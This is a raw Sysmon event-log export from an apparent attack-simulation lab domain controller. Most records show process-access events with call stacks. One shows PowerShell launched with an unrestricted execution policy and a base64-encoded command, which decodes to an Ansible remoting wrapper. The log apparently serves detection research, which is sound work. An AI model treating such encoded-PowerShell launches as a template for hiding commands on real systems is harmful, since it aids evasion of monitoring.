13:54:06.305{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003317Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.305{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003316Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.305{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003315Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.305{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003314Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.305{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003313Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.305{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003312Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.305{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003311Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.305{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003310Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.305{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003309Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.305{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-857E-5FCF-A000-000000009101}1976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003308Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.305{10ACEC4A-857E-5FCF-9F00-000000009101}49005048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-857E-5FCF-A000-000000009101}1976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66672516(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b13120(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b12df1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+665c46d6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65ad3987(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b31e56(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b154bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b154bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b1534c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b072d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b13804(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b133f7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b13120(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b12df1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+665c46d6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65af9c52(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65af9222(wow64) 154100x80000000000000003307Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.318{10ACEC4A-857E-5FCF-A000-000000009101}1976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-857E-5FCF-ED48-060000000000}0x648ed0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-857E-5FCF-9F00-000000009101}4900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0A 10341000x80000000000000003306Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.258{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-857E-5FCF-9F00-000000009101}4900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003305Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.258{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-857E-5FCF-9F00-000000009101}4900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003304Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.211{10ACEC4A-857E-5FCF-9F00-000000009101}4900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_g2dannse.ywa.ps12020-12-08 13:54:06.211 10341000x80000000000000003303Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.211{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-857E-5FCF-9F00-000000009101}4900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d3